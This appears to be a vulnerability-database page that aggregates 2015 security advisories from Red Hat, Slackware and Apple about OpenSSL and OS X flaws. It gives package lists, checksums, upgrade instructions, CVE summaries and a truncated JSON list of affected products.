x86_64: openssl-1.0.1e-30.el6_6.7.i686.rpm openssl-1.0.1e-30.el6_6.7.x86_64.rpm openssl-debuginfo-1.0.1e-30.el6_6.7.i686.rpm openssl-debuginfo-1.0.1e-30.el6_6.7.x86_64.rpm openssl-devel-1.0.1e-30.el6_6.7.i686.rpm openssl-devel-1.0.1e-30.el6_6.7.x86_64.rpm
Red Hat Enterprise Linux Workstation Optional (v. 6):
i386: openssl-debuginfo-1.0.1e-30.el6_6.7.i686.rpm openssl-perl-1.0.1e-30.el6_6.7.i686.rpm openssl-static-1.0.1e-30.el6_6.7.i686.rpm
x86_64: openssl-debuginfo-1.0.1e-30.el6_6.7.x86_64.rpm openssl-perl-1.0.1e-30.el6_6.7.x86_64.rpm openssl-static-1.0.1e-30.el6_6.7.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/
- References:
https://access.redhat.com/security/cve/CVE-2015-0209 https://access.redhat.com/security/cve/CVE-2015-0286 https://access.redhat.com/security/cve/CVE-2015-0287 https://access.redhat.com/security/cve/CVE-2015-0288 https://access.redhat.com/security/cve/CVE-2015-0289 https://access.redhat.com/security/cve/CVE-2015-0292 https://access.redhat.com/security/cve/CVE-2015-0293 https://access.redhat.com/security/updates/classification/#moderate https://www.openssl.org/news/secadv_20150319.txt https://access.redhat.com/articles/1384453
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2015 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1
iD8DBQFVEJ3JXlSAg2UNWIIRAsnPAJsFc2cGj1Hg8zbtE3wCCEj2hRaLaQCfaVRX z2xamw9PEJVbuKTXaQeLRmQ= =ZkF+ -----END PGP SIGNATURE-----
-- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce.
Here are the details from the Slackware 14.1 ChangeLog: +--------------------------+ patches/packages/openssl-1.0.1m-i486-1_slack14.1.txz: Upgraded. Fixes several bugs and security issues: o Segmentation fault in ASN1_TYPE_cmp fix (CVE-2015-0286) o ASN.1 structure reuse memory corruption fix (CVE-2015-0287) o PKCS7 NULL pointer dereferences fix (CVE-2015-0289) o DoS via reachable assert in SSLv2 servers fix (CVE-2015-0293) o Use After Free following d2i_ECPrivatekey error fix (CVE-2015-0209) o X509_to_X509_REQ NULL pointer deref fix (CVE-2015-0288) o Removed the export ciphers from the DEFAULT ciphers For more information, see: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0286 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0287 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0289 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0293 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0209 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0288 ( Security fix ) +--------------------------+
Where to find the new packages: +-----------------------------+
Thanks to the friendly folks at the OSU Open Source Lab (http://osuosl.org) for donating FTP and rsync hosting to the Slackware project! :-)
Also see the "Get Slack" section on http://slackware.com for additional mirror sites near you.
Updated packages for Slackware 13.0: ftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/openssl-0.9.8zf-i486-1_slack13.0.txz ftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/openssl-solibs-0.9.8zf-i486-1_slack13.0.txz
Updated packages for Slackware x86_64 13.0: ftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/openssl-0.9.8zf-x86_64-1_slack13.0.txz ftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/openssl-solibs-0.9.8zf-x86_64-1_slack13.0.txz
Updated packages for Slackware 13.1: ftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/openssl-0.9.8zf-i486-1_slack13.1.txz ftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/openssl-solibs-0.9.8zf-i486-1_slack13.1.txz
Updated packages for Slackware x86_64 13.1: ftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/openssl-0.9.8zf-x86_64-1_slack13.1.txz ftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/openssl-solibs-0.9.8zf-x86_64-1_slack13.1.txz
Updated packages for Slackware 13.37: ftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/openssl-0.9.8zf-i486-1_slack13.37.txz ftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/openssl-solibs-0.9.8zf-i486-1_slack13.37.txz
Updated packages for Slackware x86_64 13.37: ftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/openssl-0.9.8zf-x86_64-1_slack13.37.txz ftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/openssl-solibs-0.9.8zf-x86_64-1_slack13.37.txz
Updated packages for Slackware 14.0: ftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/openssl-1.0.1m-i486-1_slack14.0.txz ftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/openssl-solibs-1.0.1m-i486-1_slack14.0.txz
Updated packages for Slackware x86_64 14.0: ftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/openssl-1.0.1m-x86_64-1_slack14.0.txz ftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/openssl-solibs-1.0.1m-x86_64-1_slack14.0.txz
Updated packages for Slackware 14.1: ftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/openssl-1.0.1m-i486-1_slack14.1.txz ftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/openssl-solibs-1.0.1m-i486-1_slack14.1.txz
Updated packages for Slackware x86_64 14.1: ftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/openssl-1.0.1m-x86_64-1_slack14.1.txz ftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/openssl-solibs-1.0.1m-x86_64-1_slack14.1.txz
Updated packages for Slackware -current: ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/a/openssl-solibs-1.0.1m-i486-1.txz ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/openssl-1.0.1m-i486-1.txz
Updated packages for Slackware x86_64 -current: ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/a/openssl-solibs-1.0.1m-x86_64-1.txz ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/openssl-1.0.1m-x86_64-1.txz
MD5 signatures: +-------------+
Slackware 13.0 packages: 9ba57b2971962ceb6205ec7b7e6b84e7 openssl-0.9.8zf-i486-1_slack13.0.txz 706ef57bb71992961584a3d957c5dbcb openssl-solibs-0.9.8zf-i486-1_slack13.0.txz
Slackware x86_64 13.0 packages: 5f581b663798eacc8e7df4c292f33dbf openssl-0.9.8zf-x86_64-1_slack13.0.txz fe5f33f4d2db08b4f8d724e62bf6e514 openssl-solibs-0.9.8zf-x86_64-1_slack13.0.txz
Slackware 13.1 packages: 1ef0ba15454da786993361c927084438 openssl-0.9.8zf-i486-1_slack13.1.txz 2b3e20bcaa77f39512b6edcbc41b5471 openssl-solibs-0.9.8zf-i486-1_slack13.1.txz
Slackware x86_64 13.1 packages: f8fae10a1936cf900d362b65d9b2c8df openssl-0.9.8zf-x86_64-1_slack13.1.txz 0093e35c46382eeef03a51421895ed65 openssl-solibs-0.9.8zf-x86_64-1_slack13.1.txz
Slackware 13.37 packages: 7d4dd0f76252c98622a5f5939f6f0674 openssl-0.9.8zf-i486-1_slack13.37.txz e5cde01c0773ac78d33964e4107878df openssl-solibs-0.9.8zf-i486-1_slack13.37.txz
Slackware x86_64 13.37 packages: 379424e15bd378e00a5ba0c709432429 openssl-0.9.8zf-x86_64-1_slack13.37.txz 54832ad7e5440ce1c496be47fec9140d openssl-solibs-0.9.8zf-x86_64-1_slack13.37.txz
Slackware 14.0 packages: 8abafa33d2bf90b6cd8be849c0d9a643 openssl-1.0.1m-i486-1_slack14.0.txz bac56213a540586d801d7b57608396de openssl-solibs-1.0.1m-i486-1_slack14.0.txz
Slackware x86_64 14.0 packages: b4c6c971e74b678c68671feed18fa7dc openssl-1.0.1m-x86_64-1_slack14.0.txz acac871e22b5de998544c2f6431c0139 openssl-solibs-1.0.1m-x86_64-1_slack14.0.txz
Slackware 14.1 packages: c1f47f1f1ba5a13d6ac2ef2ae48bfb4c openssl-1.0.1m-i486-1_slack14.1.txz b7b1761ae1585f406d303273812043d3 openssl-solibs-1.0.1m-i486-1_slack14.1.txz
Slackware x86_64 14.1 packages: 1c6e11e2e3454836d5a3e9243f7c7738 openssl-1.0.1m-x86_64-1_slack14.1.txz 25b7a704816a2123463ddbfabbc1b86d openssl-solibs-1.0.1m-x86_64-1_slack14.1.txz
Slackware -current packages: 0926b2429e1326c8ab9bcbbda056dc66 a/openssl-solibs-1.0.1m-i486-1.txz b6252d0f141eba7b0a8e8c5bbdc314f0 n/openssl-1.0.1m-i486-1.txz
Slackware x86_64 -current packages: 99b903f556c7a2d5ec283f04c2f5a650 a/openssl-solibs-1.0.1m-x86_64-1.txz 9ecb47e0b70bd7f8064c96fb2211c4b7 n/openssl-1.0.1m-x86_64-1.txz
Installation instructions: +------------------------+
Upgrade the packages as root:
upgradepkg openssl-1.0.1m-i486-1_slack14.1.txz openssl-solibs-1.0.1m-i486-1_slack14.1.txz
+-----+
Slackware Linux Security Team http://slackware.com/gpg-key security@slackware.com
+------------------------------------------------------------------------+ | To leave the slackware-security mailing list: | +------------------------------------------------------------------------+ | Send an email to majordomo@slackware.com with this text in the body of | | the email message: | | | | unsubscribe slackware-security | | | | You will get a confirmation message back containing instructions to | | complete the process. Please do not reply to this email address. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256
APPLE-SA-2015-06-30-2 OS X Yosemite v10.10.4 and Security Update 2015-005
OS X Yosemite v10.10.4 and Security Update 2015-005 are now available and address the following:
Admin Framework Available for: OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.3 Impact: A process may gain admin privileges without proper authentication Description: An issue existed when checking XPC entitlements. CVE-ID CVE-2015-3671 : Emil Kvarnhammar at TrueSec
Admin Framework Available for: OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.3 Impact: A non-admin user may obtain admin rights Description: An issue existed in the handling of user authentication. CVE-ID CVE-2015-3672 : Emil Kvarnhammar at TrueSec
Admin Framework Available for: OS X Yosemite v10.10 to v10.10.3 Impact: An attacker may abuse Directory Utility to gain root privileges Description: Directory Utility was able to be moved and modified to achieve code execution within an entitled process. CVE-ID CVE-2015-3674 : Dean Jerkovich of NCC Group
apache Available for: OS X Yosemite v10.10 to v10.10.3 Impact: An attacker may be able to access directories that are protected with HTTP authentication without knowing the correct credentials Description: The default Apache configuration did not include mod_hfs_apple. If Apache was manually enabled and the configuration was not changed, some files that should not be accessible might have been accessible using a specially crafted URL. CVE-ID CVE-2015-1157 CVE-2015-3685 : Apple CVE-2015-3686 : John Villamil (@day6reak), Yahoo Pentest Team CVE-2015-3687 : John Villamil (@day6reak), Yahoo Pentest Team CVE-2015-3688 : John Villamil (@day6reak), Yahoo Pentest Team CVE-2015-3689 : Apple
coreTLS Available for: OS X Yosemite v10.10 to v10.10.3 Impact: An attacker with a privileged network position may intercept SSL/TLS connections Description: coreTLS accepted short ephemeral Diffie-Hellman (DH) keys, as used in export-strength ephemeral DH cipher suites. This issue, also known as Logjam, allowed an attacker with a privileged network position to downgrade security to 512-bit DH if the server supported an export-strength ephemeral DH cipher suite. The issue was addressed by increasing the default minimum size allowed for DH ephemeral keys to 768 bits. CVE-ID CVE-2015-3692 : Trammell Hudson of Two Sigma Investments, Xeno Kovah and Corey Kallenberg of LegbaCore LLC, Pedro Vilaca
EFI Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.3 Impact: A malicious application may induce memory corruption to escalate privileges Description: A disturbance error, also known as Rowhammer, exists with some DDR3 RAM that could have led to memory corruption. CVE-ID CVE-2015-3712 : Ian Beer of Google Project Zero
Intel Graphics Driver Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.3 Impact: Multiple buffer overflow issues exist in the Intel graphics driver, the most serious of which may lead to arbitrary code execution with system privileges Description: Multiple buffer overflow issues existed in the Intel graphics driver. CVE-ID CVE-2015-3695 : Ian Beer of Google Project Zero CVE-2015-3696 : Ian Beer of Google Project Zero CVE-2015-3697 : Ian Beer of Google Project Zero CVE-2015-3698 : Ian Beer of Google Project Zero CVE-2015-3699 : Ian Beer of Google Project Zero CVE-2015-3700 : Ian Beer of Google Project Zero CVE-2015-3701 : Ian Beer of Google Project Zero CVE-2015-3702 : KEEN Team
ImageIO Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.3 Impact: Multiple vulnerabilities existed in libtiff, the most serious of which may lead to arbitrary code execution Description: Multiple vulnerabilities existed in libtiff versions prior to 4.0.4. CVE-ID CVE-2015-3709 : Ian Beer of Google Project Zero
Mail Available for: OS X Yosemite v10.10 to v10.10.3 Impact: A maliciously crafted email can replace the message content with an arbitrary webpage when the message is viewed Description: An issue existed in the support for HTML email which allowed message content to be refreshed with an arbitrary webpage. CVE-ID CVE-2015-3711 : Peter Rutenbar working with HP's Zero Day Initiative
ntp Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.3 Impact: An attacker in a privileged position may be able to perform a denial of service attack against two ntp clients Description: Multiple issues existed in the authentication of ntp packets being received by configured end-points. Geshev working with HP's Zero Day Initiative CVE-2015-3662 : kdot working with HP's Zero Day Initiative CVE-2015-3663 : kdot working with HP's Zero Day Initiative CVE-2015-3666 : Steven Seeley of Source Incite working with HP's Zero Day Initiative CVE-2015-3667 : Ryan Pentney, Richard Johnson of Cisco Talos and Kai Lu of Fortinet's FortiGuard Labs, Ryan Pentney, and Richard Johnson of Cisco Talos and Kai Lu of Fortinet's FortiGuard Labs CVE-2015-3668 : Kai Lu of Fortinet's FortiGuard Labs CVE-2015-3713 : Apple
Security Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.3 Impact: A remote attacker may cause an unexpected application termination or arbitrary code execution Description: An integer overflow existed in the Security framework code for parsing S/MIME e-mail and some other signed or encrypted objects. CVE-ID CVE-2013-1741
Security Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.3 Impact: Tampered applications may not be prevented from launching Description: Apps using custom resource rules may have been susceptible to tampering that would not have invalidated the signature. CVE-ID CVE-2015-3715 : Patrick Wardle of Synack
Spotlight Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.3 Impact: Searching for a malicious file with Spotlight may lead to command injection Description: A command injection vulnerability existed in the handling of filenames of photos added to the local photo library. By sending a maliciously formatted message to systemstatsd, it may have been possible to execute arbitrary code as the systemstatsd process. CVE-ID
CVE-2014-8139 CVE-2014-8140 CVE-2014-8141
OS X Yosemite 10.10.4 includes the security content of Safari 8.0.7
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201503-0055", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "communications policy management", "scope": "eq", "trust": 1.1, "vendor": "oracle", "version": "9.9.1" }, { "model": "communications policy management", "scope": "eq", "trust": 1.1, "vendor": "oracle", "version": "9.7.3" }, { "model": "communications policy management", "scope": "eq", "trust": 1.1, "vendor": "oracle", "version": "10.4.1" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0d" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0m" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0n" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0o" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0h" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1b" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1k" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0a" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1g" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0j" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0g" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0b" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0p" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0q" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1e" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1h" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1a" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1j" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1c" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1f" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0f" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0e" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0i" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0c" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1d" }, { "model": "openssl", "scope": "lte", "trust": 1.0, "vendor": "openssl", "version": "0.9.8ze" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1i" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0l" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.2" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1l" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0k" }, { "model": "openssl", "scope": "lt", "trust": 0.8, "vendor": "openssl", "version": "0.9.8 thats all 0.9.8zf" }, { "model": "openssl", "scope": "lt", "trust": 0.8, "vendor": "openssl", "version": "1.0.0 thats all 1.0.0r" }, { "model": "openssl", "scope": "lt", "trust": 0.8, "vendor": "openssl", "version": "1.0.1 thats all 1.0.1m" }, { "model": "openssl", "scope": "lt", "trust": 0.8, "vendor": "openssl", "version": "1.0.2 thats all 1.0.2a" }, { "model": "mac os x", "scope": "eq", "trust": 0.8, "vendor": "apple", "version": "10.10 to 10.10.3 (ht204942)" }, { "model": "mac os x", "scope": "lt", "trust": 0.8, "vendor": "apple", "version": "10.6.8 or later 10.11 (ht205267)" }, { "model": "ios", "scope": "lt", "trust": 0.8, "vendor": "apple", "version": "9 (ipad 2 or later )" }, { "model": "ios", "scope": "lt", "trust": 0.8, "vendor": "apple", "version": "9 (iphone 4s or later )" }, { "model": "ios", "scope": "lt", "trust": 0.8, "vendor": "apple", "version": "9 (ipod touch first 5 after generation )" }, { "model": "mysql", "scope": "lte", "trust": 0.8, "vendor": "oracle", "version": "5.6.25" }, { "model": "mysql", "scope": "lte", "trust": 0.8, "vendor": "oracle", "version": "enterprise monitor 2.3.20" }, { "model": "mysql", "scope": "lte", "trust": 0.8, "vendor": "oracle", "version": "enterprise monitor 3.0.22" }, { "model": "communications applications", "scope": "lte", "trust": 0.8, "vendor": "oracle", "version": "of oracle enterprise session border controller ecz7.3m1p4" }, { "model": "communications policy management", "scope": "lte", "trust": 0.8, "vendor": "oracle", "version": "12.1.1" }, { "model": "enterprise manager", "scope": "lt", "trust": 0.8, "vendor": "oracle", "version": "ops center 12.1.4" }, { "model": "enterprise manager", "scope": "eq", "trust": 0.8, "vendor": "oracle", "version": "ops center 12.2.0" }, { "model": "enterprise manager", "scope": "eq", "trust": 0.8, "vendor": "oracle", "version": "ops center 12.2.1" }, { "model": "enterprise manager", "scope": "eq", "trust": 0.8, "vendor": "oracle", "version": "ops center 12.3.0" }, { "model": "fusion middleware", "scope": "eq", "trust": 0.8, "vendor": "oracle", "version": "of oracle business intelligence enterprise edition 11.1.1.7" }, { "model": "fusion middleware", "scope": "eq", "trust": 0.8, "vendor": "oracle", "version": "of oracle business intelligence enterprise edition 11.1.1.9" }, { "model": "fusion middleware", "scope": "eq", "trust": 0.8, "vendor": "oracle", "version": "of oracle endeca server 7.3.0.0" }, { "model": "fusion middleware", "scope": "eq", "trust": 0.8, "vendor": "oracle", "version": "of oracle endeca server 7.4.0.0" }, { "model": "fusion middleware", "scope": "eq", "trust": 0.8, "vendor": "oracle", "version": "of oracle endeca server 7.5.1.1" }, { "model": "fusion middleware", "scope": "eq", "trust": 0.8, "vendor": "oracle", "version": "of oracle endeca server 7.6.1.0.0" }, { "model": "fusion middleware", "scope": "eq", "trust": 0.8, "vendor": "oracle", "version": "of oracle exalogic infrastructure 2.0.6.2" }, { "model": "fusion middleware", "scope": "eq", "trust": 0.8, "vendor": "oracle", "version": "of oracle tuxedo tuxedo 12.1.1.0" }, { "model": "peoplesoft products", "scope": "eq", "trust": 0.8, "vendor": "oracle", "version": "of peoplesoft enterprise peopletools 8.53" }, { "model": "peoplesoft products", "scope": "eq", "trust": 0.8, "vendor": "oracle", "version": "of peoplesoft enterprise peopletools 8.54" }, { "model": "secure backup", "scope": "lt", "trust": 0.8, "vendor": "oracle", "version": "10.4.0.4.0" }, { "model": "virtualization", "scope": "eq", "trust": 0.8, "vendor": "oracle", "version": "of oracle secure global desktop 4.63" }, { "model": "virtualization", "scope": "eq", "trust": 0.8, "vendor": "oracle", "version": "of oracle secure global desktop 4.71" }, { "model": "virtualization", "scope": "eq", "trust": 0.8, "vendor": "oracle", "version": "of oracle secure global desktop 5.1" }, { "model": "virtualization", "scope": "eq", "trust": 0.8, "vendor": "oracle", "version": "of oracle secure global desktop 5.2" }, { "model": "hp icewall mcrp", "scope": "eq", "trust": 0.8, "vendor": "hewlett packard", "version": "2.1" }, { "model": "hp icewall mcrp", "scope": "eq", "trust": 0.8, "vendor": "hewlett packard", "version": "2.1 sp1" }, { "model": "hp icewall mcrp", "scope": "eq", "trust": 0.8, "vendor": "hewlett packard", "version": "2.1 sp2" }, { "model": "hp icewall mcrp", "scope": "eq", "trust": 0.8, "vendor": "hewlett packard", "version": "3.0" }, { "model": "hp icewall sso", "scope": "eq", "trust": 0.8, "vendor": "hewlett packard", "version": "agent 8.0" }, { "model": "hp icewall sso", "scope": "eq", "trust": 0.8, "vendor": "hewlett packard", "version": "agent 8.0 2007 update release 2" }, { "model": "hp icewall sso", "scope": "eq", "trust": 0.8, "vendor": "hewlett packard", "version": "dfw 10.0" }, { "model": "hp icewall sso", "scope": "eq", "trust": 0.8, "vendor": "hewlett packard", "version": "dfw 8.0" }, { "model": "hp icewall sso", "scope": "eq", "trust": 0.8, "vendor": "hewlett packard", "version": "dfw 8.0 r1" }, { "model": "hp icewall sso", "scope": "eq", "trust": 0.8, "vendor": "hewlett packard", "version": "dfw 8.0 r2" }, { "model": "hp icewall sso", "scope": "eq", "trust": 0.8, "vendor": "hewlett packard", "version": "dfw 8.0 r3" }, { "model": "csview", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "/web questionnaire" }, { "model": "enterprisedirectoryserver", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "ver6.0 to ver8.0" }, { "model": "enterpriseidentitymanager", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "ver2.0 to 8.0" }, { "model": "express5800", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "/sg series intersecvm/sg v1.2" }, { "model": "express5800", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "v3.0" }, { "model": "express5800", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "v3.1" }, { "model": "express5800", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "v4.0" }, { "model": "express5800", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "/sg series sg3600lm/lg/lj v6.1" }, { "model": "express5800", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "v6.2" }, { "model": "express5800", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "v7.0" }, { "model": "express5800", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "v7.1" }, { "model": "express5800", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "v8.0" }, { "model": "express5800", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "/sg series univerge sg3000lg/lj" }, { "model": "express5800", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "/sigmablade em card (n8405-019/019a/043) firmware rev.14.02 before" }, { "model": "istorage", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "hs series" }, { "model": "istorage", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "nv7400/nv5400/nv3400 series" }, { "model": "istorage", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "nv7500/nv5500/nv3500 series" }, { "model": "ix2000 series", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "ver.8.7.22 all subsequent" }, { "model": "ix3000 series", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "ver.8.7.22 all subsequent" }, { "model": "secureware/pki application development kit", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "ver3.0" }, { "model": "secureware/pki application development kit", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "ver3.01" }, { "model": "secureware/pki application development kit", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "ver3.02" }, { "model": "secureware/pki application development kit", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "ver3.1" }, { "model": "systemdirector enterprise", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "for java ( all models ) v5.1 to v7.2" }, { "model": "univerge", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "3c cmm" }, { "model": "univerge", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "3c ucm v8.5.4 before" }, { "model": "webotx", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "enterprise edition v4.2 to v6.5" }, { "model": "webotx", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "standard edition v4.2 to v6.5" }, { "model": "webotx", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "standard-j edition v4.1 to v6.5" }, { "model": "webotx", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "uddi registry v1.1 to v7.1" }, { "model": "webotx", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "web edition v4.1 to v6.5" }, { "model": "webotx application server", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "enterprise edition v7.1" }, { "model": "webotx application server", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "enterprise v8.2 to v9.2" }, { "model": "webotx application server", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "express v8.2 to v9.2" }, { "model": "webotx application server", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "foundation v8.2 to v8.5" }, { "model": "webotx application server", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "standard edition v7.1" }, { "model": "webotx application server", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "standard v8.2 to v9.2" }, { "model": "webotx application server", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "standard-j edition v7.1 to v8.1" }, { "model": "webotx 